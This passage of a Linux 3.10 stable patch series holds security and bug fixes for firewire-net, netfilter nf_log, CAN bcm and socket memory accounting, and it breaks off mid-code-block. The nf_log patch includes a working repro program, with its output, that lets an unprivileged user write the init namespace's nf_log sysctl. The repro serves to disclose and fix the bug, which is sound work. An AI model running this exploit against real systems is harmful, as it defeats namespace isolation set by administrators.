Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Juerg Haefliger <juerg.haefliger@hpe.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/net/ethernet/mellanox/mlx4/en_netdev.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/net/ethernet/mellanox/mlx4/en_netdev.c b/drivers/net/ethernet/mellanox/mlx4/en_netdev.c
index 063f3f4..a206ce6 100644
--- a/drivers/net/ethernet/mellanox/mlx4/en_netdev.c
+++ b/drivers/net/ethernet/mellanox/mlx4/en_netdev.c
@@ -2027,7 +2027,7 @@ static int mlx4_en_set_vf_mac(struct net_device *dev, int queue, u8 *mac)
 	struct mlx4_en_dev *mdev = en_priv->mdev;
 	u64 mac_u64 = mlx4_en_mac_to_u64(mac);
 
-	if (!is_valid_ether_addr(mac))
+	if (is_multicast_ether_addr(mac))
 		return -EINVAL;
 
 	return mlx4_set_vf_mac(mdev->dev, en_priv->port, queue, mac_u64);
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 249/319] firewire: net: guard against rx buffer overflows
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (147 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 248/319] net/mlx4_core: Allow resetting VF admin mac to zero Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 250/319] firewire: net: fix fragmented datagram_size off-by-one Willy Tarreau
                   ` (69 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Stefan Richter, Willy Tarreau

From: Stefan Richter <stefanr@s5r6.in-berlin.de>

commit 667121ace9dbafb368618dbabcf07901c962ddac upstream.

The IP-over-1394 driver firewire-net lacked input validation when
handling incoming fragmented datagrams.  A maliciously formed fragment
with a suitably large datagram_offset would cause a memcpy past the
datagram buffer.

So, drop any packets carrying a fragment with offset + length larger
than datagram_size.

In addition, ensure that
  - GASP header, unfragmented encapsulation header, or fragment
    encapsulation header actually exists before we access it,
  - the encapsulated datagram or fragment is of nonzero size.
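
The checks listed above can be sketched in userspace roughly as follows.
This is only a model under stated assumptions: payload_after_header(),
fragment_fits() and fragment_self_check() are hypothetical names, the
8-byte header size used in the self-check corresponds to the two quadlets
a fragment header occupies, and the bounds test is rearranged so that the
sum cannot wrap (the driver itself compares fg_off + len against dg_size
directly, which is fine for its 12-bit fields).

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/*
 * Bytes left after a header of hdr_size bytes, or 0 if the packet is too
 * short to hold the header plus at least one byte of data.
 */
static inline size_t payload_after_header(size_t len, size_t hdr_size)
{
	return len > hdr_size ? len - hdr_size : 0;
}

/*
 * True if a fragment of len bytes at offset fg_off lies entirely inside a
 * datagram buffer of dg_size bytes.  Same condition as
 * "fg_off + len <= dg_size", arranged so the sum cannot wrap.
 */
static inline bool fragment_fits(size_t fg_off, size_t len, size_t dg_size)
{
	return len != 0 && fg_off <= dg_size && len <= dg_size - fg_off;
}

/* Hypothetical self-check with a 1500-byte datagram. */
static inline void fragment_self_check(void)
{
	assert(payload_after_header(8, 8) == 0);	/* header only: drop */
	assert(payload_after_header(9, 8) == 1);
	assert(fragment_fits(0, 1500, 1500));
	assert(fragment_fits(1000, 500, 1500));
	assert(!fragment_fits(1000, 501, 1500));	/* one byte too far */
	assert(!fragment_fits(4095, 16, 1500));		/* offset past the end */
}
```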

Reported-by: Eyal Itkin <eyal.itkin@gmail.com>
Reviewed-by: Eyal Itkin <eyal.itkin@gmail.com>
Fixes: CVE-2016-8633
Signed-off-by: Stefan Richter <stefanr@s5r6.in-berlin.de>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/firewire/net.c | 51 ++++++++++++++++++++++++++++++++++----------------
 1 file changed, 35 insertions(+), 16 deletions(-)

diff --git a/drivers/firewire/net.c b/drivers/firewire/net.c
index 7bdb6fe6..70a716e 100644
--- a/drivers/firewire/net.c
+++ b/drivers/firewire/net.c
@@ -591,6 +591,9 @@ static int fwnet_incoming_packet(struct fwnet_device *dev, __be32 *buf, int len,
 	int retval;
 	u16 ether_type;
 
+	if (len <= RFC2374_UNFRAG_HDR_SIZE)
+		return 0;
+
 	hdr.w0 = be32_to_cpu(buf[0]);
 	lf = fwnet_get_hdr_lf(&hdr);
 	if (lf == RFC2374_HDR_UNFRAG) {
@@ -615,7 +618,12 @@ static int fwnet_incoming_packet(struct fwnet_device *dev, __be32 *buf, int len,
 		return fwnet_finish_incoming_packet(net, skb, source_node_id,
 						    is_broadcast, ether_type);
 	}
+
 	/* A datagram fragment has been received, now the fun begins. */
+
+	if (len <= RFC2374_FRAG_HDR_SIZE)
+		return 0;
+
 	hdr.w1 = ntohl(buf[1]);
 	buf += 2;
 	len -= RFC2374_FRAG_HDR_SIZE;
@@ -629,6 +637,9 @@ static int fwnet_incoming_packet(struct fwnet_device *dev, __be32 *buf, int len,
 	datagram_label = fwnet_get_hdr_dgl(&hdr);
 	dg_size = fwnet_get_hdr_dg_size(&hdr); /* ??? + 1 */
 
+	if (fg_off + len > dg_size)
+		return 0;
+
 	spin_lock_irqsave(&dev->lock, flags);
 
 	peer = fwnet_peer_find_by_node_id(dev, source_node_id, generation);
@@ -735,6 +746,22 @@ static void fwnet_receive_packet(struct fw_card *card, struct fw_request *r,
 	fw_send_response(card, r, rcode);
 }
 
+static int gasp_source_id(__be32 *p)
+{
+	return be32_to_cpu(p[0]) >> 16;
+}
+
+static u32 gasp_specifier_id(__be32 *p)
+{
+	return (be32_to_cpu(p[0]) & 0xffff) << 8 |
+	       (be32_to_cpu(p[1]) & 0xff000000) >> 24;
+}
+
+static u32 gasp_version(__be32 *p)
+{
+	return be32_to_cpu(p[1]) & 0xffffff;
+}
+
 static void fwnet_receive_broadcast(struct fw_iso_context *context,
 		u32 cycle, size_t header_length, void *header, void *data)
 {
@@ -744,9 +771,6 @@ static void fwnet_receive_broadcast(struct fw_iso_context *context,
 	__be32 *buf_ptr;
 	int retval;
 	u32 length;
-	u16 source_node_id;
-	u32 specifier_id;
-	u32 ver;
 	unsigned long offset;
 	unsigned long flags;
 
@@ -763,22 +787,17 @@ static void fwnet_receive_broadcast(struct fw_iso_context *context,
 
 	spin_unlock_irqrestore(&dev->lock, flags);
 
-	specifier_id =    (be32_to_cpu(buf_ptr[0]) & 0xffff) << 8
-			| (be32_to_cpu(buf_ptr[1]) & 0xff000000) >> 24;
-	ver = be32_to_cpu(buf_ptr[1]) & 0xffffff;
-	source_node_id = be32_to_cpu(buf_ptr[0]) >> 16;
-
-	if (specifier_id == IANA_SPECIFIER_ID &&
-	    (ver == RFC2734_SW_VERSION
+	if (length > IEEE1394_GASP_HDR_SIZE &&
+	    gasp_specifier_id(buf_ptr) == IANA_SPECIFIER_ID &&
+	    (gasp_version(buf_ptr) == RFC2734_SW_VERSION
 #if IS_ENABLED(CONFIG_IPV6)
-	     || ver == RFC3146_SW_VERSION
+	     || gasp_version(buf_ptr) == RFC3146_SW_VERSION
 #endif
-	    )) {
-		buf_ptr += 2;
-		length -= IEEE1394_GASP_HDR_SIZE;
-		fwnet_incoming_packet(dev, buf_ptr, length, source_node_id,
+	    ))
+		fwnet_incoming_packet(dev, buf_ptr + 2,
+				      length - IEEE1394_GASP_HDR_SIZE,
+				      gasp_source_id(buf_ptr),
 				      context->card->generation, true);
-	}
 
 	packet.payload_length = dev->rcv_buffer_size;
 	packet.interrupt = 1;
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 250/319] firewire: net: fix fragmented datagram_size off-by-one
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (148 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 249/319] firewire: net: guard against rx buffer overflows Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 251/319] netfilter: fix namespace handling in nf_log_proc_dostring Willy Tarreau
                   ` (68 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Stefan Richter, Willy Tarreau

From: Stefan Richter <stefanr@s5r6.in-berlin.de>

commit e9300a4b7bbae83af1f7703938c94cf6dc6d308f upstream.

RFC 2734 defines the datagram_size field in fragment encapsulation
headers thus:

    datagram_size:  The encoded size of the entire IP datagram.  The
    value of datagram_size [...] SHALL be one less than the value of
    Total Length in the datagram's IP header (see STD 5, RFC 791).

Accordingly, the eth1394 driver of Linux 2.6.36 and older set and got
this field with a -/+1 offset:

    ether1394_tx() /* transmit */
        ether1394_encapsulate_prep()
            hdr->ff.dg_size = dg_size - 1;

    ether1394_data_handler() /* receive */
        if (hdr->common.lf == ETH1394_HDR_LF_FF)
            dg_size = hdr->ff.dg_size + 1;
        else
            dg_size = hdr->sf.dg_size + 1;

Likewise, I observe OS X 10.4 and Windows XP Pro SP3 to transmit 1500
byte sized datagrams in fragments with datagram_size=1499 if link
fragmentation is required.

Only firewire-net sets and gets datagram_size without this offset.  The
result is a lack of interoperability between firewire-net and OS X,
Windows XP, and presumably Linux's eth1394.  (I did not test with the latter.)
For example, FTP data transfers to a Linux firewire-net box with max_rec
smaller than the 1500 bytes MTU
  - from OS X fail entirely,
  - from Win XP start out with a bunch of fragmented datagrams which
    time out, then continue with unfragmented datagrams because Win XP
    temporarily reduces the MTU to 576 bytes.

So let's fix firewire-net's datagram_size accessors.
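
For illustration, the corrected accessors can be modeled in userspace like
this. The mask and shift mirror the patched macros; the function names and
the self-check are hypothetical. A 1500-byte datagram is encoded as 1499 on
the wire and decoded back to 1500, whereas an unpatched receiver would read
1499.

```c
#include <assert.h>
#include <stdint.h>

/* datagram_size lives in bits 16..27 of the first header quadlet. */
#define DG_SIZE_MASK  0x0fff0000u
#define DG_SIZE_SHIFT 16

/* Transmit side: the wire value is one less than the datagram length. */
static inline uint32_t encode_dg_size(uint32_t dg_size)
{
	return (dg_size - 1) << DG_SIZE_SHIFT;
}

/* Receive side after the fix: add the 1 back. */
static inline uint32_t decode_dg_size(uint32_t w0)
{
	return ((w0 & DG_SIZE_MASK) >> DG_SIZE_SHIFT) + 1;
}

/* Receive side before the fix: the raw field was used as the length. */
static inline uint32_t decode_dg_size_unpatched(uint32_t w0)
{
	return (w0 & DG_SIZE_MASK) >> DG_SIZE_SHIFT;
}

/* Hypothetical self-check for a 1500-byte datagram. */
static inline void dg_size_self_check(void)
{
	uint32_t w0 = encode_dg_size(1500);

	assert((w0 >> DG_SIZE_SHIFT) == 1499);		/* value on the wire */
	assert(decode_dg_size(w0) == 1500);		/* patched peer */
	assert(decode_dg_size_unpatched(w0) == 1499);	/* unpatched peer */
}
```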

Note that firewire-net thereby loses interoperability with unpatched
firewire-net, but only if link fragmentation is employed.  (This happens
with large broadcast datagrams, and with large datagrams on several
FireWire CardBus cards with smaller max_rec than equivalent PCI cards,
and it can be worked around by setting a small enough MTU.)

Signed-off-by: Stefan Richter <stefanr@s5r6.in-berlin.de>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/firewire/net.c | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/drivers/firewire/net.c b/drivers/firewire/net.c
index 70a716e..1321319 100644
--- a/drivers/firewire/net.c
+++ b/drivers/firewire/net.c
@@ -73,13 +73,13 @@ struct rfc2734_header {
 
 #define fwnet_get_hdr_lf(h)		(((h)->w0 & 0xc0000000) >> 30)
 #define fwnet_get_hdr_ether_type(h)	(((h)->w0 & 0x0000ffff))
-#define fwnet_get_hdr_dg_size(h)	(((h)->w0 & 0x0fff0000) >> 16)
+#define fwnet_get_hdr_dg_size(h)	((((h)->w0 & 0x0fff0000) >> 16) + 1)
 #define fwnet_get_hdr_fg_off(h)		(((h)->w0 & 0x00000fff))
 #define fwnet_get_hdr_dgl(h)		(((h)->w1 & 0xffff0000) >> 16)
 
-#define fwnet_set_hdr_lf(lf)		((lf)  << 30)
+#define fwnet_set_hdr_lf(lf)		((lf) << 30)
 #define fwnet_set_hdr_ether_type(et)	(et)
-#define fwnet_set_hdr_dg_size(dgs)	((dgs) << 16)
+#define fwnet_set_hdr_dg_size(dgs)	(((dgs) - 1) << 16)
 #define fwnet_set_hdr_fg_off(fgo)	(fgo)
 
 #define fwnet_set_hdr_dgl(dgl)		((dgl) << 16)
@@ -635,7 +635,7 @@ static int fwnet_incoming_packet(struct fwnet_device *dev, __be32 *buf, int len,
 		fg_off = fwnet_get_hdr_fg_off(&hdr);
 	}
 	datagram_label = fwnet_get_hdr_dgl(&hdr);
-	dg_size = fwnet_get_hdr_dg_size(&hdr); /* ??? + 1 */
+	dg_size = fwnet_get_hdr_dg_size(&hdr);
 
 	if (fg_off + len > dg_size)
 		return 0;
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 251/319] netfilter: fix namespace handling in nf_log_proc_dostring
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (149 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 250/319] firewire: net: fix fragmented datagram_size off-by-one Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 252/319] can: bcm: fix warning in bcm_connect/proc_register Willy Tarreau
                   ` (67 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Jann Horn, Pablo Neira Ayuso, Willy Tarreau

From: Jann Horn <jann@thejh.net>

commit dbb5918cb333dfeb8897f8e8d542661d2ff5b9a0 upstream.

nf_log_proc_dostring() used current's network namespace instead of the one
corresponding to the sysctl file the write was performed on. Because the
permission check happens at open time and the nf_log files in namespaces
are accessible for the namespace owner, this can be abused by an
unprivileged user to effectively write to the init namespace's nf_log
sysctls.

Stash the "struct net *" in extra2 - data and extra1 are already used.
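
To make the difference concrete, here is a small userspace model of the
two lookups. All types and names in it (net_model, ctl_entry_model,
write_logger_old/new) are hypothetical stand-ins, not kernel structures:
the old handler acts on the namespace of whoever performs the write, the
new one on the namespace recorded in the table entry when the sysctl was
registered.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Stand-in for a network namespace holding one nf_log setting. */
struct net_model {
	char logger[16];
};

/* Stand-in for a sysctl table entry; extra2 records the owning namespace. */
struct ctl_entry_model {
	void *extra2;
};

static inline void set_logger(struct net_model *net, const char *name)
{
	snprintf(net->logger, sizeof(net->logger), "%s", name);
}

/* Old behaviour: act on the namespace of the task doing the write. */
static inline void write_logger_old(const struct ctl_entry_model *entry,
				    struct net_model *current_ns,
				    const char *name)
{
	(void)entry;
	set_logger(current_ns, name);
}

/* New behaviour: act on the namespace the sysctl file belongs to. */
static inline void write_logger_new(const struct ctl_entry_model *entry,
				    struct net_model *current_ns,
				    const char *name)
{
	(void)current_ns;
	set_logger(entry->extra2, name);
}

/* Hypothetical self-check: a file from the child namespace is written
 * by a task that runs in the init namespace. */
static inline void nf_log_self_check(void)
{
	struct net_model init_ns, child_ns;
	struct ctl_entry_model child_file = { .extra2 = &child_ns };

	set_logger(&init_ns, "nf_log_ipv4");
	set_logger(&child_ns, "nf_log_ipv4");

	write_logger_old(&child_file, &init_ns, "NONE");
	assert(strcmp(init_ns.logger, "NONE") == 0);	/* wrong namespace hit */

	set_logger(&init_ns, "nf_log_ipv4");
	write_logger_new(&child_file, &init_ns, "NONE");
	assert(strcmp(init_ns.logger, "nf_log_ipv4") == 0);
	assert(strcmp(child_ns.logger, "NONE") == 0);
}
```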

Repro code:

#define _GNU_SOURCE
#include <stdlib.h>
#include <sched.h>
#include <err.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>

char child_stack[1000000];

uid_t outer_uid;
gid_t outer_gid;
int stolen_fd = -1;

void writefile(char *path, char *buf) {
        int fd = open(path, O_WRONLY);
        if (fd == -1)
                err(1, "unable to open thing");
        if (write(fd, buf, strlen(buf)) != strlen(buf))
                err(1, "unable to write thing");
        close(fd);
}

int child_fn(void *p_) {
        if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
                  NULL))
                err(1, "mount");

        /* Yes, we need to set the maps for the net sysctls to recognize us
         * as namespace root.
         */
        char buf[1000];
        sprintf(buf, "0 %d 1\n", (int)outer_uid);
        writefile("/proc/1/uid_map", buf);
        writefile("/proc/1/setgroups", "deny");
        sprintf(buf, "0 %d 1\n", (int)outer_gid);
        writefile("/proc/1/gid_map", buf);

        stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
        if (stolen_fd == -1)
                err(1, "open nf_log");
        return 0;
}

int main(void) {
        outer_uid = getuid();
        outer_gid = getgid();

        int child = clone(child_fn, child_stack + sizeof(child_stack),
                          CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
                          |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
        if (child == -1)
                err(1, "clone");
        int status;
        if (wait(&status) != child)
                err(1, "wait");
        if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
                errx(1, "child exit status bad");

        char *data = "NONE";
        if (write(stolen_fd, data, strlen(data)) != strlen(data))
                err(1, "write");
        return 0;
}

Repro:

$ gcc -Wall -o attack attack.c -std=gnu99
$ cat /proc/sys/net/netfilter/nf_log/2
nf_log_ipv4
$ ./attack
$ cat /proc/sys/net/netfilter/nf_log/2
NONE

Because this looks like an issue with very low severity, I'm sending it to
the public list directly.

Signed-off-by: Jann Horn <jann@thejh.net>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/netfilter/nf_log.c | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/net/netfilter/nf_log.c b/net/netfilter/nf_log.c
index 3b18dd1..07ed65a 100644
--- a/net/netfilter/nf_log.c
+++ b/net/netfilter/nf_log.c
@@ -253,7 +253,7 @@ static int nf_log_proc_dostring(ctl_table *table, int write,
 	size_t size = *lenp;
 	int r = 0;
 	int tindex = (unsigned long)table->extra1;
-	struct net *net = current->nsproxy->net_ns;
+	struct net *net = table->extra2;
 
 	if (write) {
 		if (size > sizeof(buf))
@@ -306,7 +306,6 @@ static int netfilter_log_sysctl_init(struct net *net)
 				 3, "%d", i);
 			nf_log_sysctl_table[i].procname	=
 				nf_log_sysctl_fnames[i];
-			nf_log_sysctl_table[i].data = NULL;
 			nf_log_sysctl_table[i].maxlen =
 				NFLOGGER_NAME_LEN * sizeof(char);
 			nf_log_sysctl_table[i].mode = 0644;
@@ -317,6 +316,9 @@ static int netfilter_log_sysctl_init(struct net *net)
 		}
 	}
 
+	for (i = NFPROTO_UNSPEC; i < NFPROTO_NUMPROTO; i++)
+		table[i].extra2 = net;
+
 	net->nf.nf_log_dir_header = register_net_sysctl(net,
 						"net/netfilter/nf_log",
 						table);
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 252/319] can: bcm: fix warning in bcm_connect/proc_register
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (150 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 251/319] netfilter: fix namespace handling in nf_log_proc_dostring Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 253/319] net: fix sk_mem_reclaim_partial() Willy Tarreau
                   ` (66 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Oliver Hartkopp, Marc Kleine-Budde, Willy Tarreau

From: Oliver Hartkopp <socketcan@hartkopp.net>

commit deb507f91f1adbf64317ad24ac46c56eeccfb754 upstream.

Andrey Konovalov reported an issue with proc_register in bcm.c.
As suggested by Cong Wang, this patch adds lock_sock() protection and
a check for an unsuccessful proc_create_data() in bcm_connect().

Reference: http://marc.info/?l=linux-netdev&m=147732648731237

Reported-by: Andrey Konovalov <andreyknvl@google.com>
Suggested-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: Oliver Hartkopp <socketcan@hartkopp.net>
Acked-by: Cong Wang <xiyou.wangcong@gmail.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: Marc Kleine-Budde <mkl@pengutronix.de>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/can/bcm.c | 32 +++++++++++++++++++++++---------
 1 file changed, 23 insertions(+), 9 deletions(-)

diff --git a/net/can/bcm.c b/net/can/bcm.c
index 35cf02d..dd0781c 100644
--- a/net/can/bcm.c
+++ b/net/can/bcm.c
@@ -1500,24 +1500,31 @@ static int bcm_connect(struct socket *sock, struct sockaddr *uaddr, int len,
 	struct sockaddr_can *addr = (struct sockaddr_can *)uaddr;
 	struct sock *sk = sock->sk;
 	struct bcm_sock *bo = bcm_sk(sk);
+	int ret = 0;
 
 	if (len < sizeof(*addr))
 		return -EINVAL;
 
-	if (bo->bound)
-		return -EISCONN;
+	lock_sock(sk);
+
+	if (bo->bound) {
+		ret = -EISCONN;
+		goto fail;
+	}
 
 	/* bind a device to this socket */
 	if (addr->can_ifindex) {
 		struct net_device *dev;
 
 		dev = dev_get_by_index(&init_net, addr->can_ifindex);
-		if (!dev)
-			return -ENODEV;
-
+		if (!dev) {
+			ret = -ENODEV;
+			goto fail;
+		}
 		if (dev->type != ARPHRD_CAN) {
 			dev_put(dev);
-			return -ENODEV;
+			ret = -ENODEV;
+			goto fail;
 		}
 
 		bo->ifindex = dev->ifindex;
@@ -1528,17 +1535,24 @@ static int bcm_connect(struct socket *sock, struct sockaddr *uaddr, int len,
 		bo->ifindex = 0;
 	}
 
-	bo->bound = 1;
-
 	if (proc_dir) {
 		/* unique socket address as filename */
 		sprintf(bo->procname, "%lu", sock_i_ino(sk));
 		bo->bcm_proc_read = proc_create_data(bo->procname, 0644,
 						     proc_dir,
 						     &bcm_proc_fops, sk);
+		if (!bo->bcm_proc_read) {
+			ret = -ENOMEM;
+			goto fail;
+		}
 	}
 
-	return 0;
+	bo->bound = 1;
+
+fail:
+	release_sock(sk);
+
+	return ret;
 }
 
 static int bcm_recvmsg(struct kiocb *iocb, struct socket *sock,
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 253/319] net: fix sk_mem_reclaim_partial()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (151 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 252/319] can: bcm: fix warning in bcm_connect/proc_register Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 254/319] net: avoid sk_forward_alloc overflows Willy Tarreau
                   ` (65 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Eric Dumazet, David S . Miller, Willy Tarreau

From: Eric Dumazet <edumazet@google.com>

commit 1a24e04e4b50939daa3041682b38b82c896ca438 upstream.

The goal of sk_mem_reclaim_partial() is to ensure each socket has
one SK_MEM_QUANTUM of forward allocation. This is needed both for
performance and for better handling of memory pressure situations in
follow-up patches.

SK_MEM_QUANTUM is currently a page, but might be reduced to 4096 bytes
as some arches have 64KB pages.
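
The arithmetic can be checked with a small userspace model. This is only a
sketch: the struct, the 4096-byte quantum and all function names are
assumptions made for illustration. Passing "forward_alloc - 1" to the
reclaim helper leaves between 1 byte and one full quantum on the socket,
whereas the old masking code left between 0 and quantum - 1 bytes, so a
socket holding an exact multiple of the quantum was drained to zero.

```c
#include <assert.h>

#define QUANTUM_SHIFT 12			/* assumed 4096-byte quantum */
#define QUANTUM       (1 << QUANTUM_SHIFT)

/* Minimal stand-in for the accounting fields of a socket. */
struct sock_model {
	int  forward_alloc;	/* bytes reserved by this socket */
	long allocated;		/* protocol-wide counter, in quanta */
};

/* Old helper: always strips every whole quantum. */
static inline void reclaim_old(struct sock_model *sk)
{
	sk->allocated -= sk->forward_alloc >> QUANTUM_SHIFT;
	sk->forward_alloc &= QUANTUM - 1;
}

/* New helper: strips the whole quanta contained in amount. */
static inline void reclaim_new(struct sock_model *sk, int amount)
{
	amount >>= QUANTUM_SHIFT;
	sk->allocated -= amount;
	sk->forward_alloc -= amount << QUANTUM_SHIFT;
}

static inline void reclaim_partial_new(struct sock_model *sk)
{
	if (sk->forward_alloc > QUANTUM)
		reclaim_new(sk, sk->forward_alloc - 1);
}

/* Hypothetical self-check with three quanta of forward allocation. */
static inline void reclaim_self_check(void)
{
	struct sock_model a = { 3 * QUANTUM, 10 };
	struct sock_model b = { 3 * QUANTUM, 10 };

	reclaim_old(&a);		/* old: nothing left on the socket */
	assert(a.forward_alloc == 0 && a.allocated == 7);

	reclaim_partial_new(&b);	/* new: one quantum is kept */
	assert(b.forward_alloc == QUANTUM && b.allocated == 8);
}
```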

Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/net/sock.h | 6 +++---
 net/core/sock.c    | 9 +++++----
 2 files changed, 8 insertions(+), 7 deletions(-)

diff --git a/include/net/sock.h b/include/net/sock.h
index 2317d12..6d2fbac 100644
--- a/include/net/sock.h
+++ b/include/net/sock.h
@@ -1358,7 +1358,7 @@ static inline struct inode *SOCK_INODE(struct socket *socket)
  * Functions for memory accounting
  */
 extern int __sk_mem_schedule(struct sock *sk, int size, int kind);
-extern void __sk_mem_reclaim(struct sock *sk);
+void __sk_mem_reclaim(struct sock *sk, int amount);
 
 #define SK_MEM_QUANTUM ((int)PAGE_SIZE)
 #define SK_MEM_QUANTUM_SHIFT ilog2(SK_MEM_QUANTUM)
@@ -1399,7 +1399,7 @@ static inline void sk_mem_reclaim(struct sock *sk)
 	if (!sk_has_account(sk))
 		return;
 	if (sk->sk_forward_alloc >= SK_MEM_QUANTUM)
-		__sk_mem_reclaim(sk);
+		__sk_mem_reclaim(sk, sk->sk_forward_alloc);
 }
 
 static inline void sk_mem_reclaim_partial(struct sock *sk)
@@ -1407,7 +1407,7 @@ static inline void sk_mem_reclaim_partial(struct sock *sk)
 	if (!sk_has_account(sk))
 		return;
 	if (sk->sk_forward_alloc > SK_MEM_QUANTUM)
-		__sk_mem_reclaim(sk);
+		__sk_mem_reclaim(sk, sk->sk_forward_alloc - 1);
 }
 
 static inline void sk_mem_charge(struct sock *sk, int size)
diff --git a/net/core/sock.c b/net/core/sock.c
index 5a954fc..6473fef 100644
--- a/net/core/sock.c
+++ b/net/core/sock.c
@@ -2048,12 +2048,13 @@ EXPORT_SYMBOL(__sk_mem_schedule);
 /**
  *	__sk_reclaim - reclaim memory_allocated
  *	@sk: socket
+ *	@amount: number of bytes (rounded down to a SK_MEM_QUANTUM multiple)
  */
-void __sk_mem_reclaim(struct sock *sk)
+void __sk_mem_reclaim(struct sock *sk, int amount)
 {
-	sk_memory_allocated_sub(sk,
-				sk->sk_forward_alloc >> SK_MEM_QUANTUM_SHIFT);
-	sk->sk_forward_alloc &= SK_MEM_QUANTUM - 1;
+	amount >>= SK_MEM_QUANTUM_SHIFT;
+	sk_memory_allocated_sub(sk, amount);
+	sk->sk_forward_alloc -= amount << SK_MEM_QUANTUM_SHIFT;
 
 	if (sk_under_memory_pressure(sk) &&
 	    (sk_memory_allocated(sk) < sk_prot_mem_limits(sk, 0)))
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 254/319] net: avoid sk_forward_alloc overflows
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (152 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 253/319] net: fix sk_mem_reclaim_partial() Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 255/319] ipmr, ip6mr: fix scheduling while atomic and a deadlock with ipmr_get_route Willy Tarreau
                   ` (64 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Eric Dumazet, David S . Miller, Willy Tarreau

From: Eric Dumazet <edumazet@google.com>

commit 20c64d5cd5a2bdcdc8982a06cb05e5e1bd851a3d upstream.

A malicious TCP receiver, sending SACK, can force the sender to split
skbs in the write queue and increase its memory usage.

Then, when the socket is closed and its write queue purged, we might
overflow sk_forward_alloc (it becomes negative).

sk_mem_reclaim() does nothing in this case, and more than 2GB
are leaked from the TCP perspective (tcp_memory_allocated is not changed).

Then warnings trigger from inet_sock_destruct() and
sk_stream_kill_queues() seeing a nonzero sk_forward_alloc.

The whole TCP stack can get stuck because TCP is under memory pressure.

A simple fix is to preemptively reclaim from sk_mem_uncharge().

This makes sure a socket won't have more than 2 MB forward allocated
after a burst and an idle period.
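
A rough userspace model of the capped uncharge path is shown below. The
struct, the 4096-byte quantum and the function names are assumptions for
illustration only. It releases more than 2 GB in 64 KB pieces, which would
overflow a plain int counter, and checks that the forward allocation stays
below 2 MB after every call.

```c
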